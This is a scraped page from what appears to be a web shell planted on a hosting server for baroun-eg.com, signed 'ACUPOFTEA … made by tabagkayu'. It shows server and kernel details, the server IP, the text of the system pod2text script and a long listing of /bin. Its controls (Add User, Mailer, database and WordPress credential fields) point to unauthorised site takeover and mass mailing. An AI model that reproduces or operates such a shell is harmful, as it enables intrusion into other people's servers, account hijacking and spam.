System
:
Linux server53.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Software
:
LiteSpeed
Server
:
198.54.126.113
Domains
:
Cant read /etc/named.conf
Permission
:
[
dr-xr-xr-x
]
:
/
bin
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for baroun-eg.com made by tabagkayu.
Folder Name
File Name
File Content
File
pod2text
#!/usr/bin/perl eval 'exec /usr/bin/perl -S $0 ${1+"$@"}' if $running_under_some_shell; # Convert POD data to formatted ASCII text. # # The driver script for Pod::Text, Pod::Text::Termcap, and Pod::Text::Color, # invoked by perldoc -t among other things. # # SPDX-License-Identifier: GPL-1.0-or-later OR Artistic-1.0-Perl use 5.006; use strict; use warnings; use Getopt::Long qw(GetOptions); use Pod::Text (); use Pod::Usage qw(pod2usage); # Clean up $0 for error reporting. $0 =~ s%.*/%%; # Take an initial pass through our options, looking for one of the form # -<number>. We turn that into -w <number> for compatibility with the # original pod2text script. for (my $i = 0; $i < @ARGV; $i++) { last if $ARGV[$i] =~ /^--$/; if ($ARGV[$i] =~ /^-(\d+)$/) { splice (@ARGV, $i++, 1, '-w', $1); } } # Insert -- into @ARGV before any single dash argument to hide it from # Getopt::Long; we want to interpret it as meaning stdin (which Pod::Simple # does correctly). my $stdin; @ARGV = map { $_ eq '-' && !$stdin++ ? ('--', $_) : $_ } @ARGV; # Parse our options. Use the same names as Pod::Text for simplicity. my %options; Getopt::Long::config ('bundling'); GetOptions (\%options, 'alt|a', 'code', 'color|c', 'errors=s', 'help|h', 'indent|i=i', 'loose|l', 'margin|left-margin|m=i', 'nourls', 'overstrike|o', 'quotes|q=s', 'sentence|s', 'stderr', 'termcap|t', 'utf8|u', 'width|w=i') or exit 1; pod2usage (1) if $options{help}; # Figure out what formatter we're going to use. -c overrides -t. my $formatter = 'Pod::Text'; if ($options{color}) { $formatter = 'Pod::Text::Color'; eval { require Term::ANSIColor }; if ($@) { die "-c (--color) requires Term::ANSIColor be installed\n" } require Pod::Text::Color; } elsif ($options{termcap}) { $formatter = 'Pod::Text::Termcap'; require Pod::Text::Termcap; } elsif ($options{overstrike}) { $formatter = 'Pod::Text::Overstrike'; require Pod::Text::Overstrike; } delete @options{'color', 'termcap', 'overstrike'}; # If neither stderr nor errors is set, default to errors = die. if (!defined $options{stderr} && !defined $options{errors}) { $options{errors} = 'die'; } # Initialize and run the formatter. my $parser = $formatter->new (%options); my $status = 0; do { my ($input, $output) = splice (@ARGV, 0, 2); $parser->parse_from_file ($input, $output); if ($parser->{CONTENTLESS}) { $status = 1; if (defined $input) { warn "$0: unable to format $input\n"; } else { warn "$0: unable to format standard input\n"; } if (defined ($output) and $output ne '-') { unlink $output unless (-s $output); } } } while (@ARGV); exit $status; __END__ =for stopwords -aclostu --alt --stderr Allbery --overstrike overstrike --termcap --utf8 UTF-8 subclasses --nourls =head1 NAME pod2text - Convert POD data to formatted ASCII text =head1 SYNOPSIS pod2text [B<-aclostu>] [B<--code>] [B<--errors>=I<style>] [B<-i> I<indent>] S<[B<-q> I<quotes>]> [B<--nourls>] [B<--stderr>] S<[B<-w> I<width>]> [I<input> [I<output> ...]] pod2text B<-h> =head1 DESCRIPTION B<pod2text> is a front-end for Pod::Text and its subclasses. It uses them to generate formatted ASCII text from POD source. It can optionally use either termcap sequences or ANSI color escape sequences to format the text. I<input> is the file to read for POD source (the POD can be embedded in code). If I<input> isn't given, it defaults to C<STDIN>. I<output>, if given, is the file to which to write the formatted output. If I<output> isn't given, the formatted output is written to C<STDOUT>. Several POD files can be processed in the same B<pod2text> invocation (saving module load and compile times) by providing multiple pairs of I<input> and I<output> files on the command line. =head1 OPTIONS =over 4 =item B<-a>, B<--alt> Use an alternate output format that, among other things, uses a different heading style and marks C<=item> entries with a colon in the left margin. =item B<--code> Include any non-POD text from the input file in the output as well. Useful for viewing code documented with POD blocks with the POD rendered and the code left intact. =item B<-c>, B<--color> Format the output with ANSI color escape sequences. Using this option requires that Term::ANSIColor be installed on your system. =item B<--errors>=I<style> Set the error handling style. C<die> says to throw an exception on any POD formatting error. C<stderr> says to report errors on standard error, but not to throw an exception. C<pod> says to include a POD ERRORS section in the resulting documentation summarizing the errors. C<none> ignores POD errors entirely, as much as possible. The default is C<die>. =item B<-i> I<indent>, B<--indent=>I<indent> Set the number of spaces to indent regular text, and the default indentation for C<=over> blocks. Defaults to 4 spaces if this option isn't given. =item B<-h>, B<--help> Print out usage information and exit. =item B<-l>, B<--loose> Print a blank line after a C<=head1> heading. Normally, no blank line is printed after C<=head1>, although one is still printed after C<=head2>, because this is the expected formatting for manual pages; if you're formatting arbitrary text documents, using this option is recommended. =item B<-m> I<width>, B<--left-margin>=I<width>, B<--margin>=I<width> The width of the left margin in spaces. Defaults to 0. This is the margin for all text, including headings, not the amount by which regular text is indented; for the latter, see B<-i> option. =item B<--nourls> Normally, LZ<><> formatting codes with a URL but anchor text are formatted to show both the anchor text and the URL. In other words: L<foo|http://example.com/> is formatted as: foo <http://example.com/> This flag, if given, suppresses the URL when anchor text is given, so this example would be formatted as just C<foo>. This can produce less cluttered output in cases where the URLs are not particularly important. =item B<-o>, B<--overstrike> Format the output with overstrike printing. Bold text is rendered as character, backspace, character. Italics and file names are rendered as underscore, backspace, character. Many pagers, such as B<less>, know how to convert this to bold or underlined text. =item B<-q> I<quotes>, B<--quotes>=I<quotes> Sets the quote marks used to surround CE<lt>> text to I<quotes>. If I<quotes> is a single character, it is used as both the left and right quote. Otherwise, it is split in half, and the first half of the string is used as the left quote and the second is used as the right quote. I<quotes> may also be set to the special value C<none>, in which case no quote marks are added around CE<lt>> text. =item B<-s>, B<--sentence> Assume each sentence ends with two spaces and try to preserve that spacing. Without this option, all consecutive whitespace in non-verbatim paragraphs is compressed into a single space. =item B<--stderr> By default, B<pod2text> dies if any errors are detected in the POD input. If B<--stderr> is given and no B<--errors> flag is present, errors are sent to standard error, but B<pod2text> does not abort. This is equivalent to C<--errors=stderr> and is supported for backward compatibility. =item B<-t>, B<--termcap> Try to determine the width of the screen and the bold and underline sequences for the terminal from termcap, and use that information in formatting the output. Output will be wrapped at two columns less than the width of your terminal device. Using this option requires that your system have a termcap file somewhere where Term::Cap can find it and requires that your system support termios. With this option, the output of B<pod2text> will contain terminal control sequences for your current terminal type. =item B<-u>, B<--utf8> By default, B<pod2text> tries to use the same output encoding as its input encoding (to be backward-compatible with older versions). This option says to instead force the output encoding to UTF-8. Be aware that, when using this option, the input encoding of your POD source should be properly declared unless it's US-ASCII. Pod::Simple will attempt to guess the encoding and may be successful if it's Latin-1 or UTF-8, but it will warn, which by default results in a B<pod2text> failure. Use the C<=encoding> command to declare the encoding. See L<perlpod(1)> for more information. =item B<-w>, B<--width=>I<width>, B<->I<width> The column at which to wrap text on the right-hand side. Defaults to 76, unless B<-t> is given, in which case it's two columns less than the width of your terminal device. =back =head1 EXIT STATUS As long as all documents processed result in some output, even if that output includes errata (a C<POD ERRORS> section generated with C<--errors=pod>), B<pod2text> will exit with status 0. If any of the documents being processed do not result in an output document, B<pod2text> will exit with status 1. If there are syntax errors in a POD document being processed and the error handling style is set to the default of C<die>, B<pod2text> will abort immediately with exit status 255. =head1 DIAGNOSTICS If B<pod2text> fails with errors, see L<Pod::Text> and L<Pod::Simple> for information about what those errors might mean. Internally, it can also produce the following diagnostics: =over 4 =item -c (--color) requires Term::ANSIColor be installed (F) B<-c> or B<--color> were given, but Term::ANSIColor could not be loaded. =item Unknown option: %s (F) An unknown command line option was given. =back In addition, other L<Getopt::Long> error messages may result from invalid command-line options. =head1 ENVIRONMENT =over 4 =item COLUMNS If B<-t> is given, B<pod2text> will take the current width of your screen from this environment variable, if available. It overrides terminal width information in TERMCAP. =item TERMCAP If B<-t> is given, B<pod2text> will use the contents of this environment variable if available to determine the correct formatting sequences for your current terminal device. =back =head1 AUTHOR Russ Allbery <rra@cpan.org>. =head1 COPYRIGHT AND LICENSE Copyright 1999-2001, 2004, 2006, 2008, 2010, 2012-2018 Russ Allbery <rra@cpan.org> This program is free software; you may redistribute it and/or modify it under the same terms as Perl itself. =head1 SEE ALSO L<Pod::Text>, L<Pod::Text::Color>, L<Pod::Text::Overstrike>, L<Pod::Text::Termcap>, L<Pod::Simple>, L<perlpod(1)> The current version of this script is always available from its web site at L<https://www.eyrie.org/~eagle/software/podlators/>. It is also part of the Perl core distribution as of 5.6.0. =cut
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
dr-xr-xr-x
2026-07-21 10:39:25
..
DIR
-
drwxr-xr-x
2026-07-04 08:00:23
7za
text/x-shellscript
46 B
-rwxr-xr-x
2024-10-04 01:50:29
GET
text/x-perl
15.84 KB
-rwxr-xr-x
2022-04-22 08:13:06
Mail
application/x-sharedlib
408.89 KB
-rwxr-xr-x
2019-10-13 12:19:50
[
application/x-sharedlib
53.6 KB
-rwxr-xr-x
2026-03-24 01:05:31
aclocal
text/x-perl
35.62 KB
-rwxr-xr-x
2023-10-14 08:00:43
aclocal-1.16
text/x-perl
35.62 KB
-rwxr-xr-x
2023-10-14 08:00:43
addr2line
application/x-sharedlib
33.42 KB
-rwxr-xr-x
2025-12-18 02:21:35
animate
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
ar
application/x-sharedlib
61.96 KB
-rwxr-xr-x
2025-12-18 02:21:35
arch
application/x-sharedlib
37.34 KB
-rwxr-xr-x
2026-03-24 01:05:31
arpaname
application/x-sharedlib
11.82 KB
-rwxr-xr-x
2026-06-08 03:38:10
as
application/x-sharedlib
889.91 KB
-rwxr-xr-x
2025-12-18 02:21:35
aspell
application/x-sharedlib
159.5 KB
-rwxr-xr-x
2022-04-18 03:10:53
at
text/x-shellscript
4.4 KB
-rwxr-xr-x
2022-10-10 10:23:17
atq
text/x-shellscript
4.4 KB
-rwxr-xr-x
2022-10-10 10:23:17
atrm
text/x-shellscript
4.41 KB
-rwxr-xr-x
2022-10-10 10:23:17
autoconf
text/x-shellscript
14.42 KB
-rwxr-xr-x
2024-08-13 07:30:48
autoheader
text/x-perl
8.33 KB
-rwxr-xr-x
2024-08-13 07:30:48
autom4te
text/x-perl
31.43 KB
-rwxr-xr-x
2024-08-13 07:30:48
automake
text/x-perl
251.9 KB
-rwxr-xr-x
2023-10-14 08:00:43
automake-1.16
text/x-perl
251.9 KB
-rwxr-xr-x
2023-10-14 08:00:43
autoreconf
text/x-perl
20.57 KB
-rwxr-xr-x
2024-08-13 07:30:48
autoscan
text/x-perl
16.72 KB
-rwxr-xr-x
2024-08-13 07:30:48
autoupdate
text/x-perl
33.08 KB
-rwxr-xr-x
2024-08-13 07:30:48
awk
application/x-sharedlib
669.77 KB
-rwxr-xr-x
2022-04-18 03:56:05
b2sum
application/x-sharedlib
57.69 KB
-rwxr-xr-x
2026-03-24 01:05:31
base32
application/x-sharedlib
41.47 KB
-rwxr-xr-x
2026-03-24 01:05:31
base64
application/x-sharedlib
41.48 KB
-rwxr-xr-x
2026-03-24 01:05:31
basename
application/x-sharedlib
37.41 KB
-rwxr-xr-x
2026-03-24 01:05:31
bash
application/x-sharedlib
1.1 MB
-rwxr-xr-x
2025-08-26 08:48:39
bashbug-64
text/x-shellscript
7.18 KB
-rwxr-xr-x
2025-08-26 08:48:31
batch
text/x-shellscript
137 B
-rwxr-xr-x
2022-10-10 10:23:17
bison
application/x-sharedlib
437.72 KB
-rwxr-xr-x
2019-10-12 12:28:39
bunzip2
application/x-sharedlib
36.86 KB
-rwxr-xr-x
2025-01-28 01:38:59
bzcat
application/x-sharedlib
36.86 KB
-rwxr-xr-x
2025-01-28 01:38:59
bzcmp
text/x-shellscript
2.08 KB
-rwxr-xr-x
2025-01-28 01:38:58
bzdiff
text/x-shellscript
2.08 KB
-rwxr-xr-x
2025-01-28 01:38:58
bzgrep
text/x-shellscript
1.64 KB
-rwxr-xr-x
2025-01-28 01:38:58
bzip2
application/x-sharedlib
36.86 KB
-rwxr-xr-x
2025-01-28 01:38:59
bzip2recover
application/x-sharedlib
16.44 KB
-rwxr-xr-x
2025-01-28 01:38:59
bzless
text/x-shellscript
1.23 KB
-rwxr-xr-x
2025-01-28 01:38:58
bzmore
text/x-shellscript
1.23 KB
-rwxr-xr-x
2025-01-28 01:38:58
c++
1.21 MB
-rwxr-x---
2025-08-26 09:47:24
c++filt
application/x-sharedlib
28.89 KB
-rwxr-xr-x
2025-12-18 02:21:35
c89
224 B
-rwxr-x---
2025-08-26 09:45:19
c99
215 B
-rwxr-x---
2025-08-26 09:45:19
cagefs_enter.proxied
text/x-shellscript
4.42 KB
-rwxr-xr-x
2026-01-20 01:58:37
cal
application/x-sharedlib
65.98 KB
-rwxr-xr-x
2026-02-04 08:18:19
captoinfo
application/x-sharedlib
85.31 KB
-rwxr-xr-x
2023-10-14 06:54:49
cat
application/x-sharedlib
37.46 KB
-rwxr-xr-x
2026-03-24 01:05:31
catchsegv
text/x-shellscript
3.21 KB
-rwxr-xr-x
2026-06-29 04:07:38
cc
1.21 MB
-rwxr-x---
2025-08-26 09:47:26
chgrp
application/x-sharedlib
66.29 KB
-rwxr-xr-x
2026-03-24 01:05:31
chmod
application/x-sharedlib
62.2 KB
-rwxr-xr-x
2026-03-24 01:05:31
chown
application/x-sharedlib
70.29 KB
-rwxr-xr-x
2026-03-24 01:05:31
chrt
application/x-sharedlib
37.19 KB
-rwxr-xr-x
2026-02-04 08:18:19
cksum
application/x-sharedlib
37.39 KB
-rwxr-xr-x
2026-03-24 01:05:31
cldetect
text/x-python
10.34 KB
-rwxr-xr-x
2026-06-03 10:46:51
clear
application/x-sharedlib
12.54 KB
-rwxr-xr-x
2023-10-14 06:54:49
clusterdb
application/x-sharedlib
70.23 KB
-rwxr-xr-x
2024-02-27 08:25:00
cmp
application/x-sharedlib
103.76 KB
-rwxr-xr-x
2020-05-04 03:15:14
col
application/x-sharedlib
29.01 KB
-rwxr-xr-x
2026-02-04 08:18:19
colcrt
application/x-sharedlib
16.48 KB
-rwxr-xr-x
2026-02-04 08:18:19
colrm
application/x-sharedlib
24.88 KB
-rwxr-xr-x
2026-02-04 08:18:19
column
application/x-sharedlib
49.47 KB
-rwxr-xr-x
2026-02-04 08:18:19
comm
application/x-sharedlib
41.56 KB
-rwxr-xr-x
2026-03-24 01:05:31
compare
application/x-sharedlib
11.89 KB
-rwxr-xr-x
2026-06-12 10:06:24
composite
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
conjure
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
convert
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
cp
application/x-sharedlib
147.98 KB
-rwxr-xr-x
2026-03-24 01:05:31
cpan
text/x-perl
8.17 KB
-rwxr-xr-x
2025-06-03 02:32:21
cpp
application/x-sharedlib
1.21 MB
-rwxr-xr-x
2025-08-26 09:47:25
createdb
application/x-sharedlib
70.22 KB
-rwxr-xr-x
2024-02-27 08:25:00
createuser
application/x-sharedlib
74.63 KB
-rwxr-xr-x
2024-02-27 08:25:00
crontab
text/x-shellscript
1.49 KB
-rwxr-xr-x
2026-07-13 11:37:10
crontab.cagefs
application/x-executable
54.18 KB
-rwxr-xr-x
2026-05-29 09:37:59
csplit
application/x-sharedlib
53.68 KB
-rwxr-xr-x
2026-03-24 01:05:31
curl
application/x-sharedlib
230.08 KB
-rwxr-xr-x
2026-03-24 01:41:52
cut
application/x-sharedlib
49.52 KB
-rwxr-xr-x
2026-03-24 01:05:31
date
application/x-sharedlib
105.96 KB
-rwxr-xr-x
2026-03-24 01:05:31
dd
application/x-sharedlib
77.97 KB
-rwxr-xr-x
2026-03-24 01:05:31
delv
application/x-sharedlib
42.46 KB
-rwxr-xr-x
2026-06-08 03:38:10
df
application/x-sharedlib
91.09 KB
-rwxr-xr-x
2026-03-24 01:05:31
diff
application/x-sharedlib
268.01 KB
-rwxr-xr-x
2020-05-04 03:15:14
diff3
application/x-sharedlib
128.6 KB
-rwxr-xr-x
2020-05-04 03:15:14
dig
application/x-sharedlib
162.18 KB
-rwxr-xr-x
2026-06-08 03:38:10
dir
application/x-sharedlib
139.9 KB
-rwxr-xr-x
2026-03-24 01:05:31
dircolors
application/x-sharedlib
49.55 KB
-rwxr-xr-x
2026-03-24 01:05:31
dirname
application/x-sharedlib
33.36 KB
-rwxr-xr-x
2026-03-24 01:05:31
display
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
dnstap-read
application/x-sharedlib
20.43 KB
-rwxr-xr-x
2026-06-08 03:38:10
dropdb
application/x-sharedlib
66.02 KB
-rwxr-xr-x
2024-02-27 08:25:00
dropuser
application/x-sharedlib
65.99 KB
-rwxr-xr-x
2024-02-27 08:25:00
du
application/x-sharedlib
107 KB
-rwxr-xr-x
2026-03-24 01:05:31
echo
application/x-sharedlib
37.35 KB
-rwxr-xr-x
2026-03-24 01:05:31
egrep
text/x-shellscript
28 B
-rwxr-xr-x
2019-10-11 03:15:56
enc2xs
text/x-perl
40.97 KB
-rwxr-xr-x
2019-10-13 08:46:10
enchant
application/x-sharedlib
21.08 KB
-rwxr-xr-x
2019-10-23 08:03:55
enchant-lsmod
application/x-sharedlib
13.09 KB
-rwxr-xr-x
2019-10-23 08:03:55
env
application/x-sharedlib
41.35 KB
-rwxr-xr-x
2026-03-24 01:05:31
eps2eps
text/x-shellscript
639 B
-rwxr-xr-x
2025-06-03 02:48:11
eqn
application/x-sharedlib
232.16 KB
-rwxr-xr-x
2019-10-13 02:29:41
ex
application/x-sharedlib
1.13 MB
-rwxr-xr-x
2026-07-13 08:08:02
expand
application/x-sharedlib
41.59 KB
-rwxr-xr-x
2026-03-24 01:05:31
expr
application/x-sharedlib
49.57 KB
-rwxr-xr-x
2026-03-24 01:05:31
factor
application/x-sharedlib
85.97 KB
-rwxr-xr-x
2026-03-24 01:05:31
false
application/x-sharedlib
33.32 KB
-rwxr-xr-x
2026-03-24 01:05:31
fc-cache
text/x-shellscript
132 B
-rwxr-xr-x
2021-08-16 11:04:22
fc-cache-64
application/x-sharedlib
20.35 KB
-rwxr-xr-x
2021-10-09 09:02:09
fc-cat
application/x-sharedlib
16.35 KB
-rwxr-xr-x
2021-10-09 09:02:09
fc-conflist
application/x-sharedlib
12.25 KB
-rwxr-xr-x
2021-10-09 09:02:09
fc-list
application/x-sharedlib
12.25 KB
-rwxr-xr-x
2021-10-09 09:02:09
fc-match
application/x-sharedlib
16.26 KB
-rwxr-xr-x
2021-10-09 09:02:09
fc-pattern
application/x-sharedlib
12.26 KB
-rwxr-xr-x
2021-10-09 09:02:09
fc-query
application/x-sharedlib
12.24 KB
-rwxr-xr-x
2021-10-09 09:02:09
fc-scan
application/x-sharedlib
12.26 KB
-rwxr-xr-x
2021-10-09 09:02:09
fc-validate
application/x-sharedlib
16.26 KB
-rwxr-xr-x
2021-10-09 09:02:09
fgrep
text/x-shellscript
28 B
-rwxr-xr-x
2019-10-11 03:15:56
file
application/x-sharedlib
24.69 KB
-rwxr-xr-x
2025-10-07 06:30:49
find
application/x-sharedlib
223.27 KB
-rwxr-xr-x
2025-12-18 02:57:01
flex
application/x-sharedlib
428.45 KB
-rwxr-xr-x
2019-10-12 12:33:17
flex++
application/x-sharedlib
428.45 KB
-rwxr-xr-x
2019-10-12 12:33:17
flock
application/x-sharedlib
33.2 KB
-rwxr-xr-x
2026-02-04 08:18:19
fmt
application/x-sharedlib
45.49 KB
-rwxr-xr-x
2026-03-24 01:05:31
fold
application/x-sharedlib
41.42 KB
-rwxr-xr-x
2026-03-24 01:05:31
free
application/x-sharedlib
20.79 KB
-rwxr-xr-x
2023-10-14 08:31:02
freetype-config
text/x-shellscript
4.31 KB
-rwxr-xr-x
2025-03-31 07:37:30
funzip
application/x-sharedlib
36.63 KB
-rwxr-xr-x
2025-06-03 02:10:12
g++
1.21 MB
-rwxr-x---
2025-08-26 09:47:24
gawk
application/x-sharedlib
669.77 KB
-rwxr-xr-x
2022-04-18 03:56:05
gcc
1.21 MB
-rwxr-x---
2025-08-26 09:47:26
gcc-ar
application/x-sharedlib
36.66 KB
-rwxr-xr-x
2025-08-26 09:47:26
gcc-nm
application/x-sharedlib
36.66 KB
-rwxr-xr-x
2025-08-26 09:47:26
gcc-ranlib
application/x-sharedlib
36.66 KB
-rwxr-xr-x
2025-08-26 09:47:26
gcov
application/x-sharedlib
1.31 MB
-rwxr-xr-x
2025-08-26 09:47:26
gcov-dump
application/x-sharedlib
570.96 KB
-rwxr-xr-x
2025-08-26 09:47:26
gcov-tool
application/x-sharedlib
607.77 KB
-rwxr-xr-x
2025-08-26 09:47:26
gem
text/x-ruby
542 B
-rwxr-xr-x
2026-07-03 10:46:03
gencat
application/x-sharedlib
24.84 KB
-rwxr-xr-x
2026-06-29 04:18:43
geoiplookup
application/x-sharedlib
21.89 KB
-rwxr-xr-x
2019-11-28 10:06:01
geoiplookup6
application/x-sharedlib
21.65 KB
-rwxr-xr-x
2019-11-28 10:06:01
geqn
application/x-sharedlib
232.16 KB
-rwxr-xr-x
2019-10-13 02:29:41
getconf
application/x-sharedlib
32.46 KB
-rwxr-xr-x
2026-06-29 04:18:43
getent
application/x-sharedlib
33.13 KB
-rwxr-xr-x
2026-06-29 04:18:43
getopt
application/x-sharedlib
20.53 KB
-rwxr-xr-x
2026-02-04 08:18:19
ghostscript
application/x-sharedlib
12.35 KB
-rwxr-xr-x
2025-06-03 02:48:22
git
application/x-sharedlib
3.67 MB
-rwxr-xr-x
2025-07-23 06:59:57
git-receive-pack
application/x-sharedlib
3.67 MB
-rwxr-xr-x
2025-07-23 06:59:57
git-shell
application/x-sharedlib
2.13 MB
-rwxr-xr-x
2025-07-23 06:59:57
git-upload-archive
application/x-sharedlib
3.67 MB
-rwxr-xr-x
2025-07-23 06:59:57
git-upload-pack
application/x-sharedlib
3.67 MB
-rwxr-xr-x
2025-07-23 06:59:57
gm
application/x-sharedlib
7.82 KB
-rwxr-xr-x
2022-03-28 03:50:37
gmake
application/x-sharedlib
235.32 KB
-rwxr-xr-x
2022-04-18 04:38:34
gneqn
text/x-shellscript
908 B
-rwxr-xr-x
2019-10-13 02:29:37
gnroff
text/x-shellscript
3.23 KB
-rwxr-xr-x
2019-10-13 02:29:39
gpg
application/x-sharedlib
1.04 MB
-rwxr-xr-x
2026-01-16 01:48:25
gpg-agent
application/x-sharedlib
419.3 KB
-rwxr-xr-x
2026-01-16 01:48:25
gpg-error
application/x-sharedlib
34.16 KB
-rwxr-xr-x
2019-10-12 12:20:46
gpg-zip
text/x-shellscript
3.44 KB
-rwxr-xr-x
2026-01-16 01:48:21
gpgsplit
application/x-sharedlib
87.02 KB
-rwxr-xr-x
2026-01-16 01:48:25
gpgv
application/x-sharedlib
451.51 KB
-rwxr-xr-x
2026-01-16 01:48:25
gpic
application/x-sharedlib
293.84 KB
-rwxr-xr-x
2019-10-13 02:29:41
gprof
application/x-sharedlib
103.35 KB
-rwxr-xr-x
2025-12-18 02:21:35
grep
application/x-sharedlib
193.63 KB
-rwxr-xr-x
2019-10-11 03:15:57
groff
application/x-sharedlib
124.92 KB
-rwxr-xr-x
2019-10-13 02:29:41
grops
application/x-sharedlib
191.14 KB
-rwxr-xr-x
2019-10-13 02:29:41
grotty
application/x-sharedlib
141.9 KB
-rwxr-xr-x
2019-10-13 02:29:41
groups
application/x-sharedlib
37.39 KB
-rwxr-xr-x
2026-03-24 01:05:31
gs
application/x-sharedlib
12.35 KB
-rwxr-xr-x
2025-06-03 02:48:22
gsnd
text/x-shellscript
277 B
-rwxr-xr-x
2025-06-03 02:48:11
gsoelim
application/x-sharedlib
42.55 KB
-rwxr-xr-x
2019-10-13 02:29:41
gtar
application/x-sharedlib
448.99 KB
-rwxr-xr-x
2025-08-26 08:57:37
gtbl
application/x-sharedlib
154.61 KB
-rwxr-xr-x
2019-10-13 02:29:41
gtroff
application/x-sharedlib
805.02 KB
-rwxr-xr-x
2019-10-13 02:29:41
gunzip
text/x-shellscript
2.29 KB
-rwxr-xr-x
2022-04-27 05:49:28
gzexe
text/x-shellscript
6.23 KB
-rwxr-xr-x
2022-04-27 05:49:28
gzip
application/x-sharedlib
94.67 KB
-rwxr-xr-x
2022-04-27 05:49:29
h2ph
text/x-perl
28.69 KB
-rwxr-xr-x
2025-07-28 08:08:32
h2xs
text/x-perl
59.44 KB
-rwxr-xr-x
2025-07-28 08:07:09
head
application/x-sharedlib
45.5 KB
-rwxr-xr-x
2026-03-24 01:05:31
hexdump
application/x-sharedlib
57.51 KB
-rwxr-xr-x
2026-02-04 08:18:19
host
application/x-sharedlib
142.3 KB
-rwxr-xr-x
2026-06-08 03:38:10
hostid
application/x-sharedlib
33.34 KB
-rwxr-xr-x
2026-03-24 01:05:31
hostname
application/x-sharedlib
21.16 KB
-rwxr-xr-x
2019-10-11 01:06:51
hunspell
application/x-sharedlib
144.7 KB
-rwxr-xr-x
2019-10-13 08:33:15
iconv
application/x-sharedlib
61.43 KB
-rwxr-xr-x
2026-06-29 04:18:43
id
application/x-sharedlib
45.44 KB
-rwxr-xr-x
2026-03-24 01:05:31
identify
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
idn
application/x-sharedlib
39.41 KB
-rwxr-xr-x
2019-10-13 04:55:35
ifnames
text/x-perl
4.03 KB
-rwxr-xr-x
2024-08-13 07:30:48
import
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2026-06-12 10:06:24
infocmp
application/x-sharedlib
61.05 KB
-rwxr-xr-x
2023-10-14 06:54:49
infotocap
application/x-sharedlib
85.31 KB
-rwxr-xr-x
2023-10-14 06:54:49
install
application/x-sharedlib
156.16 KB
-rwxr-xr-x
2026-03-24 01:05:31
instmodsh
text/x-perl
4.1 KB
-rwxr-xr-x
2019-10-13 08:55:21
ionice
application/x-sharedlib
28.98 KB
-rwxr-xr-x
2026-02-04 08:18:19
ipcrm
application/x-sharedlib
28.99 KB
-rwxr-xr-x
2026-02-04 08:18:19
ipcs
application/x-sharedlib
53.4 KB
-rwxr-xr-x
2026-02-04 08:18:19
isosize
application/x-sharedlib
24.88 KB
-rwxr-xr-x
2026-02-04 08:18:19
ispell
text/x-shellscript
988 B
-rwxr-xr-x
2022-04-18 03:10:51
join
application/x-sharedlib
53.7 KB
-rwxr-xr-x
2026-03-24 01:05:31
kill
application/x-sharedlib
37.28 KB
-rwxr-xr-x
2026-02-04 08:18:19
ld
1.71 MB
-rwxr-x---
2025-12-18 02:21:35
ld.bfd
1.71 MB
-rwxr-x---
2025-12-18 02:21:35
ldd
text/x-shellscript
5.31 KB
-rwxr-xr-x
2026-06-29 04:07:42
less
application/x-sharedlib
173.76 KB
-rwxr-xr-x
2024-07-02 08:10:37
lessecho
application/x-sharedlib
12.4 KB
-rwxr-xr-x
2024-07-02 08:10:37
lesskey
application/x-sharedlib
21.99 KB
-rwxr-xr-x
2024-07-02 08:10:37
lesspipe.sh
text/x-shellscript
3.07 KB
-rwxr-xr-x
2024-07-02 07:57:10
lex
application/x-sharedlib
428.45 KB
-rwxr-xr-x
2019-10-12 12:33:17
libnetcfg
text/x-perl
15.41 KB
-rwxr-xr-x
2025-07-28 08:08:32
libtool
text/x-shellscript
359.11 KB
-rwxr-xr-x
2019-10-11 02:55:28
libtoolize
text/x-shellscript
126.17 KB
-rwxr-xr-x
2019-10-11 02:55:28
link
application/x-sharedlib
33.34 KB
-rwxr-xr-x
2026-03-24 01:05:31
ln
application/x-sharedlib
70.5 KB
-rwxr-xr-x
2026-03-24 01:05:31
locale
application/x-sharedlib
56.44 KB
-rwxr-xr-x
2026-06-29 04:18:43
localedef
application/x-sharedlib
307.47 KB
-rwxr-xr-x
2026-06-29 04:18:43
logger
application/x-sharedlib
49.98 KB
-rwxr-xr-x
2026-02-04 08:18:19
login
application/x-sharedlib
40.96 KB
-rwxr-xr-x
2026-02-04 08:18:19
logname
application/x-sharedlib
33.34 KB
-rwxr-xr-x
2026-03-24 01:05:31
look
application/x-sharedlib
16.46 KB
-rwxr-xr-x
2026-02-04 08:18:19
ls
application/x-sharedlib
139.91 KB
-rwxr-xr-x
2026-03-24 01:05:31
lynx
application/x-sharedlib
1.84 MB
-rwxr-xr-x
2022-04-18 09:01:05
m4
application/x-sharedlib
185.56 KB
-rwxr-xr-x
2019-10-11 02:41:40
mail
application/x-sharedlib
408.89 KB
-rwxr-xr-x
2019-10-13 12:19:50
mailx
application/x-sharedlib
408.89 KB
-rwxr-xr-x
2019-10-13 12:19:50
make
application/x-sharedlib
235.32 KB
-rwxr-xr-x
2022-04-18 04:38:34
make-dummy-cert
text/x-shellscript
610 B
-rwxr-xr-x
2026-07-13 02:12:11
mariadb
application/x-sharedlib
5.26 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-access
text/x-perl
109.48 KB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-admin
application/x-sharedlib
4.82 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-binlog
application/x-sharedlib
5.08 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-check
application/x-sharedlib
4.82 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-conv
application/x-sharedlib
4.55 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-convert-table-format
text/x-perl
4.28 KB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-dump
application/x-sharedlib
4.91 MB
-rwxr-xr-x
2026-06-11 11:52:53
mariadb-dumpslow
text/x-perl
8.19 KB
-rwxr-xr-x
2026-06-11 11:52:53
